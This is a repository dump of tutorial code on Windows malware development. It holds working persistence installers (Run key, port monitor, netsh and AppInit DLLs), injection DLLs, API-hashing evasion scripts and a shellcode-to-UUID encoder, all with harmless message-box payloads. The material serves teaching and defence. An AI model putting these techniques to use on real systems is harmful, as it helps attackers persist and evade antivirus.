https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-14-malware-injection-17/hack.exe
--------------------------------------------------------------------------------
/2022-03-14-malware-injection-17/hack2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-14-malware-injection-17/hack2.exe
--------------------------------------------------------------------------------
/2022-03-18-malware-av-evasion-4/README.md:
--------------------------------------------------------------------------------
# AV engines evasion part 4. C++ example

Simple trick: hiding Windows API calls by importing them via ordinals instead of names. C++ implementation example.

[https://cocomelonc.github.io/tutorial/2022/03/18/simple-malware-av-evasion-4.html](https://cocomelonc.github.io/tutorial/2022/03/18/simple-malware-av-evasion-4.html)
--------------------------------------------------------------------------------
/2022-03-18-malware-av-evasion-4/dll-def.py:
--------------------------------------------------------------------------------
import pefile
import sys
import os.path

# usage: python3 dll-def.py path/to/some.dll
# writes some.def into the current directory with one forwarder line per named
# export ("Name=some.Name @ordinal"), so a proxy DLL built from it re-exports
# every function under the original name and ordinal. Exports that have an
# ordinal but no name are skipped.
dll = pefile.PE(sys.argv[1])
# module name only (no directory, no extension), otherwise a path given on the
# command line would end up inside the forwarder target
dll_basename = os.path.splitext(os.path.basename(sys.argv[1]))[0]

try:
    with open(sys.argv[1].split("/")[-1].replace(".dll", ".def"), "w") as f:
        f.write("EXPORTS\n")
        for export in dll.DIRECTORY_ENTRY_EXPORT.symbols:
            if export.name:
                f.write('{}={}.{} @{}\n'.format(export.name.decode(), dll_basename, export.name.decode(), export.ordinal))
except Exception as e:
    print("failed to create .def file :(", e)
else:
    print("successfully created .def file :)")
--------------------------------------------------------------------------------
/2022-03-18-malware-av-evasion-4/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-18-malware-av-evasion-4/hack.exe
--------------------------------------------------------------------------------
/2022-03-18-malware-av-evasion-4/user32.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-18-malware-av-evasion-4/user32.dll
--------------------------------------------------------------------------------
/2022-03-22-malware-av-evasion-5/README.md:
--------------------------------------------------------------------------------
# AV engines evasion techniques - part 5. C++ malware implementation.

Simple but effective AV engine evasion technique: calling WinAPI functions by hash instead of by name. C++ malware implementation example.

[https://cocomelonc.github.io/tutorial/2022/03/22/simple-av-evasion-5.html](https://cocomelonc.github.io/tutorial/2022/03/22/simple-av-evasion-5.html)
--------------------------------------------------------------------------------
/2022-03-22-malware-av-evasion-5/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-22-malware-av-evasion-5/hack.exe
--------------------------------------------------------------------------------
/2022-03-22-malware-av-evasion-5/meow.cpp:
--------------------------------------------------------------------------------
#include <windows.h>

int main() {
  MessageBoxA(NULL, "Meow-meow!!", "=^..^=", MB_OK);
  return 0;
}
--------------------------------------------------------------------------------
/2022-03-22-malware-av-evasion-5/meow.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-22-malware-av-evasion-5/meow.exe
--------------------------------------------------------------------------------
/2022-03-22-malware-av-evasion-5/myhash.py:
--------------------------------------------------------------------------------
# simple stupid hashing example
# each step computes hash = 3 * hash + ord(c); Python ints never wrap, so mask
# with & 0xffffffff if the value is compared against a 32-bit DWORD in C
def myHash(data):
    hash = 0x35
    for i in range(0, len(data)):
        hash += ord(data[i]) + (hash << 1)
    print (hash)
    return hash

myHash("MessageBoxA")
--------------------------------------------------------------------------------
/2022-03-27-malware-analysis-5/classic.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-27-malware-analysis-5/classic.exe
--------------------------------------------------------------------------------
/2022-03-27-malware-analysis-5/evil.cpp:
--------------------------------------------------------------------------------
/*
evil.cpp
simple DLL for DLL inject to process
author: @cocomelonc
https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html
*/

#include <windows.h>
#pragma comment (lib, "user32.lib")

BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) {
  switch (nReason) {
    case DLL_PROCESS_ATTACH:
      MessageBox(
        NULL,
        "Meow from evil.dll!",
        "=^..^=",
        MB_OK
      );
      break;
    case DLL_PROCESS_DETACH:
      break;
    case DLL_THREAD_ATTACH:
      break;
    case DLL_THREAD_DETACH:
      break;
  }
  return TRUE;
}
--------------------------------------------------------------------------------
/2022-03-27-malware-analysis-5/evil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-27-malware-analysis-5/evil.dll
--------------------------------------------------------------------------------
/2022-03-27-malware-analysis-5/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-03-27-malware-analysis-5/hack.exe
--------------------------------------------------------------------------------
/2022-03-27-malware-analysis-5/myhash.py:
--------------------------------------------------------------------------------
# simple stupid hashing example
# same hash as in 2022-03-22-malware-av-evasion-5: hash = 3 * hash + ord(c) per
# character; mask with & 0xffffffff if the C side stores the hash in a DWORD
def myHash(data):
    hash = 0x35
    for i in range(0, len(data)):
        hash += ord(data[i]) + (hash << 1)
    print (data, hash)
    return hash

myHash("VirtualAllocEx")
myHash("WriteProcessMemory")
myHash("CreateRemoteThread")
myHash("OpenProcess")
--------------------------------------------------------------------------------
/2022-04-02-malware-injection-18/README.md:
--------------------------------------------------------------------------------
# Malware development tricks. Find kernel32.dll base. C++ malware implementation.

Find the kernel32.dll base by walking the PEB, then call WinAPI functions by hash. C++ malware implementation example.

[https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html](https://cocomelonc.github.io/tutorial/2022/04/02/malware-injection-18.html)
--------------------------------------------------------------------------------
/2022-04-02-malware-injection-18/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-04-02-malware-injection-18/hack.exe
--------------------------------------------------------------------------------
/2022-04-02-malware-injection-18/meow.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-04-02-malware-injection-18/meow.exe
--------------------------------------------------------------------------------
/2022-04-02-malware-injection-18/myhash.py:
--------------------------------------------------------------------------------
# simple stupid hashing example
# same hash as in 2022-03-22-malware-av-evasion-5: hash = 3 * hash + ord(c) per
# character; mask with & 0xffffffff if the C side stores the hash in a DWORD
def myHash(data):
    hash = 0x35
    for i in range(0, len(data)):
        hash += ord(data[i]) + (hash << 1)
    print (hash)
    return hash

myHash("kernel32.dll")
myHash("GetModuleHandleA")
myHash("GetProcAddress")
--------------------------------------------------------------------------------
/2022-04-09-malware-av-evasion-6/README.md: -------------------------------------------------------------------------------- 1 | # AV engines evasion techniques - part 6. C++ malware implementation. 2 | 3 | Classic payload injection with VM virtualbox evasion tricks. Detect Oracle VirtualBox via Windows Registry. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/04/09/malware-av-evasion-6.html](https://cocomelonc.github.io/tutorial/2022/04/09/malware-av-evasion-6.html) 6 | -------------------------------------------------------------------------------- /2022-04-09-malware-av-evasion-6/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-04-09-malware-av-evasion-6/hack.exe -------------------------------------------------------------------------------- /2022-04-13-malware-injection-19/README.md: -------------------------------------------------------------------------------- 1 | # Malware development tricks. Download and inject. C++ malware implementation. 2 | 3 | Simple but efficient malware dev trick. Download payload/evil DLL and execute/inject. C++ malware implementation example. 
4 | 5 | [https://cocomelonc.github.io/tutorial/2022/04/15/malware-injection-19.html](https://cocomelonc.github.io/tutorial/2022/04/15/malware-injection-19.html) 6 | -------------------------------------------------------------------------------- /2022-04-13-malware-injection-19/evil.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | simple DLL for DLL inject to process 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 12 | switch (nReason) { 13 | case DLL_PROCESS_ATTACH: 14 | MessageBox( 15 | NULL, 16 | "Meow from evil.dll!", 17 | "=^..^=", 18 | MB_OK 19 | ); 20 | break; 21 | case DLL_PROCESS_DETACH: 22 | break; 23 | case DLL_THREAD_ATTACH: 24 | break; 25 | case DLL_THREAD_DETACH: 26 | break; 27 | } 28 | return TRUE; 29 | } 30 | -------------------------------------------------------------------------------- /2022-04-13-malware-injection-19/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-04-13-malware-injection-19/evil.dll -------------------------------------------------------------------------------- /2022-04-13-malware-injection-19/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-04-13-malware-injection-19/hack.exe -------------------------------------------------------------------------------- /2022-04-20-malware-pers-1/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 1. C++ malware implementation. 
2 | 3 | Simple but efficient malware persistence technique - via registry run keys. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html](https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html) 6 | -------------------------------------------------------------------------------- /2022-04-20-malware-pers-1/hack.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | meow-meow messagebox 3 | author: @cocomelonc 4 | */ 5 | #include 6 | 7 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 8 | MessageBoxA(NULL, "Meow-meow!","=^..^=", MB_OK); 9 | return 0; 10 | } 11 | -------------------------------------------------------------------------------- /2022-04-20-malware-pers-1/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-04-20-malware-pers-1/hack.exe -------------------------------------------------------------------------------- /2022-04-20-malware-pers-1/pers.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | pers.cpp 3 | windows low level persistense via start folder registry key 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html 6 | */ 7 | #include 8 | #include 9 | 10 | int main(int argc, char* argv[]) { 11 | HKEY hkey = NULL; 12 | // malicious app 13 | const char* exe = "Z:\\2022-04-20-malware-pers-1\\hack.exe"; 14 | 15 | // startup 16 | LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0 , KEY_WRITE, &hkey); 17 | if (res == ERROR_SUCCESS) { 18 | // create new registry key 19 | RegSetValueEx(hkey, (LPCSTR)"hack", 0, REG_SZ, (unsigned char*)exe, strlen(exe)); 20 | RegCloseKey(hkey); 21 | } 22 | return 0; 23 | } 24 | 
-------------------------------------------------------------------------------- /2022-04-20-malware-pers-1/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-04-20-malware-pers-1/pers.exe -------------------------------------------------------------------------------- /2022-04-26-malware-pers-2/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 2. C++ malware implementation. 2 | 3 | Malware persistence technique - via screensavers. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html](https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html) 6 | -------------------------------------------------------------------------------- /2022-04-26-malware-pers-2/hack.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | meow-meow messagebox 3 | author: @cocomelonc 4 | */ 5 | #include 6 | 7 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 8 | MessageBoxA(NULL, "Meow-meow!","=^..^=", MB_OK); 9 | return 0; 10 | } 11 | -------------------------------------------------------------------------------- /2022-04-26-malware-pers-2/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-04-26-malware-pers-2/hack.exe -------------------------------------------------------------------------------- /2022-04-26-malware-pers-2/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-04-26-malware-pers-2/pers.exe 
-------------------------------------------------------------------------------- /2022-05-02-malware-pers-3/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 3. C++ malware implementation. 2 | 3 | Malware persistence technique - via COM hijacking. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html](https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html) 6 | -------------------------------------------------------------------------------- /2022-05-02-malware-pers-3/evil.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | simple DLL for DLL inject to process 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 12 | switch (nReason) { 13 | case DLL_PROCESS_ATTACH: 14 | MessageBox( 15 | NULL, 16 | "Meow from evil.dll!", 17 | "=^..^=", 18 | MB_OK 19 | ); 20 | break; 21 | case DLL_PROCESS_DETACH: 22 | break; 23 | case DLL_THREAD_ATTACH: 24 | break; 25 | case DLL_THREAD_DETACH: 26 | break; 27 | } 28 | return TRUE; 29 | } 30 | -------------------------------------------------------------------------------- /2022-05-02-malware-pers-3/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-02-malware-pers-3/evil.dll -------------------------------------------------------------------------------- /2022-05-02-malware-pers-3/evil.reg: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-02-malware-pers-3/evil.reg -------------------------------------------------------------------------------- /2022-05-02-malware-pers-3/orig.reg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-02-malware-pers-3/orig.reg -------------------------------------------------------------------------------- /2022-05-02-malware-pers-3/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-02-malware-pers-3/pers.exe -------------------------------------------------------------------------------- /2022-05-09-malware-pers-4/README.md: -------------------------------------------------------------------------------- 1 | # Malware development persistence tricks - part 4. C++ implementation. 2 | 3 | Simple but efficient persistence technique - via Windows Services. C++ implementation example. 
4 | 5 | [https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html](https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html) 6 | -------------------------------------------------------------------------------- /2022-05-09-malware-pers-4/meow.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-09-malware-pers-4/meow.exe -------------------------------------------------------------------------------- /2022-05-09-malware-pers-4/meowsrv.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-09-malware-pers-4/meowsrv.exe -------------------------------------------------------------------------------- /2022-05-16-malware-pers-5/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 5. C++ malware implementation. 2 | 3 | Malware persistence technique - via AppInit DLLs. C++ malware implementation example. 
4 | 5 | [https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html](https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html) 6 | -------------------------------------------------------------------------------- /2022-05-16-malware-pers-5/evil.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | inject via Appinit_DLLs 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | extern "C" { 12 | __declspec(dllexport) BOOL WINAPI runMe(void) { 13 | MessageBoxA(NULL, "Meow-meow!", "=^..^=", MB_OK); 14 | return TRUE; 15 | } 16 | } 17 | 18 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 19 | switch (nReason) { 20 | case DLL_PROCESS_ATTACH: 21 | runMe(); 22 | break; 23 | case DLL_PROCESS_DETACH: 24 | break; 25 | case DLL_THREAD_ATTACH: 26 | break; 27 | case DLL_THREAD_DETACH: 28 | break; 29 | } 30 | return TRUE; 31 | } 32 | -------------------------------------------------------------------------------- /2022-05-16-malware-pers-5/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-16-malware-pers-5/evil.dll -------------------------------------------------------------------------------- /2022-05-16-malware-pers-5/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-16-malware-pers-5/pers.exe -------------------------------------------------------------------------------- /2022-05-29-malware-pers-6/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 6. C++ malware implementation. 
2 | 3 | Malware persistence technique - via NetSh helper DLL. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/05/29/malware-pers-6.html](https://cocomelonc.github.io/tutorial/2022/05/29/malware-pers-6.html) 6 | -------------------------------------------------------------------------------- /2022-05-29-malware-pers-6/evil.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | simple DLL for netsh 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2022/05/29/malware-pers-6.html 6 | */ 7 | #include 8 | #pragma comment (lib, "user32.lib") 9 | 10 | extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved) { 11 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /2022-05-29-malware-pers-6/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-29-malware-pers-6/evil.dll -------------------------------------------------------------------------------- /2022-05-29-malware-pers-6/evil2.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | evil2.cpp 3 | simple DLL for netsh 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2022/05/29/malware-pers-6.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | DWORD WINAPI Meow(LPVOID lpParameter) { 12 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 13 | return 1; 14 | } 15 | 16 | extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved) { 17 | HANDLE hl = CreateThread(NULL, 0, Meow, NULL, 0, NULL); 18 | CloseHandle(hl); 19 | return 0; 20 | } 21 | -------------------------------------------------------------------------------- 
/2022-05-29-malware-pers-6/evil2.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-29-malware-pers-6/evil2.dll -------------------------------------------------------------------------------- /2022-05-29-malware-pers-6/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-05-29-malware-pers-6/pers.exe -------------------------------------------------------------------------------- /2022-06-05-malware-av-evasion-7/README.md: -------------------------------------------------------------------------------- 1 | # Malware AV evasion. Disable Windows Defender. 2 | 3 | Simple PoC AV evasion. Disable Windows Defender via Registry keys. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/06/05/malware-av-evasion-7.html](https://cocomelonc.github.io/tutorial/2022/06/05/malware-av-evasion-7.html) 6 | 7 | -------------------------------------------------------------------------------- /2022-06-05-malware-av-evasion-7/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-06-05-malware-av-evasion-7/hack.exe -------------------------------------------------------------------------------- /2022-06-12-malware-pers-7/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 7. C++ malware implementation. 2 | 3 | Simple malware persistence technique - via Winlogon registry keys. C++ malware implementation example. 
4 | 5 | [https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html](https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html) 6 | -------------------------------------------------------------------------------- /2022-06-12-malware-pers-7/hack.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | meow-meow messagebox 3 | author: @cocomelonc 4 | */ 5 | #include 6 | 7 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 8 | MessageBoxA(NULL, "Meow-meow!","=^..^=", MB_OK); 9 | return 0; 10 | } 11 | -------------------------------------------------------------------------------- /2022-06-12-malware-pers-7/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-06-12-malware-pers-7/hack.exe -------------------------------------------------------------------------------- /2022-06-12-malware-pers-7/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-06-12-malware-pers-7/pers.exe -------------------------------------------------------------------------------- /2022-06-19-malware-pers-8/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 8. C++ malware implementation. 2 | 3 | Malware persistence technique - via Port Monitors. C++ malware implementation example. 
4 | 5 | [https://cocomelonc.github.io/tutorial/2022/06/19/malware-pers-8.html](https://cocomelonc.github.io/tutorial/2022/06/19/malware-pers-8.html) 6 | -------------------------------------------------------------------------------- /2022-06-19-malware-pers-8/detect.ps1: -------------------------------------------------------------------------------- 1 | Get-ChildItem -recurse HKLM:\SYSTEM\CurrentControlSet\Control\Print | Get-ItemProperty | where { $_ -match "\\\\(.*)\\(.*).dll" } 2 | -------------------------------------------------------------------------------- /2022-06-19-malware-pers-8/evil.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | simple DLL for port monitor persistence 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2022/06/19/malware-pers-8.html 6 | */ 7 | #include 8 | #pragma comment (lib, "user32.lib") 9 | 10 | extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved) { 11 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /2022-06-19-malware-pers-8/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-06-19-malware-pers-8/evil.dll -------------------------------------------------------------------------------- /2022-06-19-malware-pers-8/evil2.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-06-19-malware-pers-8/evil2.dll -------------------------------------------------------------------------------- /2022-06-19-malware-pers-8/monitor.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | monitor.cpp 3 | windows persistence 
via port monitors 4 | register the monitor port 5 | author: @cocomelonc 6 | https://cocomelonc.github.io/tutorial/2022/06/19/malware-pers-8.html 7 | */ 8 | #include "windows.h" 9 | #pragma comment(lib, "winspool") 10 | 11 | int main(int argc, char* argv[]) { 12 | MONITOR_INFO_2 mi; 13 | mi.pName = "Monitor"; 14 | mi.pEnvironment = "Windows x64"; 15 | mi.pDLLName = "evil.dll"; 16 | // mi.pDLLName = "evil2.dll"; 17 | AddMonitor(NULL, 2, (LPBYTE)&mi); 18 | return 0; 19 | } 20 | -------------------------------------------------------------------------------- /2022-06-19-malware-pers-8/monitor.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-06-19-malware-pers-8/monitor.exe -------------------------------------------------------------------------------- /2022-06-19-malware-pers-8/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-06-19-malware-pers-8/pers.exe -------------------------------------------------------------------------------- /2022-06-27-malware-injection-20/README.md: -------------------------------------------------------------------------------- 1 | # Malware development trick. EnumDesktopsA. C++ malware implementation. 2 | 3 | Malware development: shellcode run via EnumDesktopsA. C++ malware implementation example. 
4 | 5 | [https://cocomelonc.github.io/tutorial/2022/06/27/malware-injection-20.html](https://cocomelonc.github.io/tutorial/2022/06/27/malware-injection-20.html) 6 | -------------------------------------------------------------------------------- /2022-06-27-malware-injection-20/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-06-27-malware-injection-20/hack.exe -------------------------------------------------------------------------------- /2022-07-13-malware-injection-21/README.md: -------------------------------------------------------------------------------- 1 | # Malware development trick. EnumChildWindows. C++ malware implementation. 2 | 3 | Malware development: shellcode run via EnumChildWindows. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2022/07/14/malware-injection-21.html](https://cocomelonc.github.io/malware/2022/07/14/malware-injection-21.html) 6 | -------------------------------------------------------------------------------- /2022-07-13-malware-injection-21/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-07-13-malware-injection-21/hack.exe -------------------------------------------------------------------------------- /2022-07-21-malware-tricks-22/README.md: -------------------------------------------------------------------------------- 1 | # Malware development trick. Run payload as Lazarus Group. C++ malware implementation. 2 | 3 | Malware development: shellcode run via UuidFromStringA and EnumDesktopA (or another suitable candidate). C++ malware implementation example. 
4 | 5 | [https://cocomelonc.github.io/malware/2022/07/21/malware-tricks-22.html](https://cocomelonc.github.io/malware/2022/07/21/malware-tricks-22.html) 6 | -------------------------------------------------------------------------------- /2022-07-21-malware-tricks-22/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-07-21-malware-tricks-22/hack.exe -------------------------------------------------------------------------------- /2022-07-21-malware-tricks-22/meow.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-07-21-malware-tricks-22/meow.bin -------------------------------------------------------------------------------- /2022-07-21-malware-tricks-22/payload_uuid.py: -------------------------------------------------------------------------------- 1 | #!usr/bin/python3 2 | 3 | from uuid import UUID 4 | import argparse 5 | 6 | parser = argparse.ArgumentParser() 7 | parser.add_argument('-p','--payload', required = True, help = "payload: binary file") 8 | args = vars(parser.parse_args()) 9 | pbin = args['payload'] 10 | 11 | with open(pbin, "rb") as f: 12 | # read in 16 bytes from our input payload 13 | chunk = f.read(16) 14 | while chunk: 15 | # if the chunk is less than 16 bytes then we pad the difference (x90) 16 | if len(chunk) < 16: 17 | padding = 16 - len(chunk) 18 | chunk = chunk + (b"\x90" * padding) 19 | print(UUID(bytes_le=chunk)) 20 | chunk = f.read(16) 21 | -------------------------------------------------------------------------------- /2022-07-29-malware-av-evasion-8/README.md: -------------------------------------------------------------------------------- 1 | # Malware AV evasion - part 8. Encode via Z85. C++ malware implementation. 2 | 3 | Malware AV evasion. 
Encoding payload via Z85 algorithm. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html](https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html) 6 | -------------------------------------------------------------------------------- /2022-07-29-malware-av-evasion-8/encode.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-07-29-malware-av-evasion-8/encode.exe -------------------------------------------------------------------------------- /2022-07-29-malware-av-evasion-8/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-07-29-malware-av-evasion-8/hack.exe -------------------------------------------------------------------------------- /2022-08-16-malware-av-evasion-9/README.md: -------------------------------------------------------------------------------- 1 | # Malware AV evasion part 9. base64 + RC4. C++ malware implementation. 2 | 3 | Malware AV evasion. Encrypt base64 encoded payload via RC4 algorithm. C++ malware implementation example. 

[https://cocomelonc.github.io/malware/2022/08/16/malware-av-evasion-9.html](https://cocomelonc.github.io/malware/2022/08/16/malware-av-evasion-9.html)

--------------------------------------------------------------------------------
/2022-08-16-malware-av-evasion-9/hack.exe:
--------------------------------------------------------------------------------
